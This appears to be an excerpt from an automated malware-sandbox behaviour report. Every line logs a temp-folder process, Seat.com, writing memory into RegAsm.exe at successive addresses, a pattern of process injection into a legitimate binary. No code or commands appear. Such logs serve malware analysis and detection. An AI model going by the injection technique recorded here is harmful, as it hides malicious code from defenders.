Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903EE4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903F48Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903FACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904010Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904074Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9040D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90413CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9041A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904204Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904268Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9042CCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904330Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904394Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9043F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90445CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9044C0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904524Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904588Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9045ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904650Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9046B4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904718Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90477CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9047E0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904844Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9048A8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90490CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904970Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9049D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904A38Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904A9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904B00Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904B64Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904BC8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904C2CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904C90Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904CF4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904D58Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904DBCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904E20Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904E84Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904EE8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904F4CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 904FB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905014Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905078Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9050DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905140Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9051A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905208Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90526CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9052D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905334Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905398Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9053FCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905460Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9054C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905528Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90558CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9055F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905654Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9056B8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90571CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905780Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9057E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905848Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9058ACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905910Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905974Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9059D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905A3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905AA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905B04Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905B68Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905BCCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905C30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905C94Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905CF8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905D5CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905DC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905E24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905E88Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905EECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905F50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 905FB4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906018Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90607CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9060E0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906144Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9061A8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90620CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906270Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9062D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906338Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90639CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906400Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906464Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9064C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90652CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906590Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9065F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906658Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9066BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906720Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906784Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9067E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90684CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9068B0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906914Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906978Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9069DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906A40Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906AA4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906B08Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906B6CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906BD0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906C34Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906C98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906CFCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906D60Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906DC4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906E28Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906E8CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906EF0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906F54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 906FB8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90701CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907080Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9070E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907148Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9071ACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907210Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907274Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9072D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90733CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9073A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907404Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907468Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9074CCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907530Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907594Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9075F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90765CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9076C0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907724Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907788Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9077ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907850Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9078B4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907918Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90797CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9079E0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907A44Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907AA8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907B0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907B70Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907BD4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907C38Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907C9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907D00Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907D64Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907DC8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907E2CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907E90Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907EF4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907F58Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 907FBCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908020Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908084Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9080E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90814CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9081B0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908214Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908278Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9082DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908340Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9083A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908408Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90846CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9084D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908534Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908598Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9085FCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908660Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9086C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908728Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90878CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9087F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 908854Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9088B8Jump to behavior
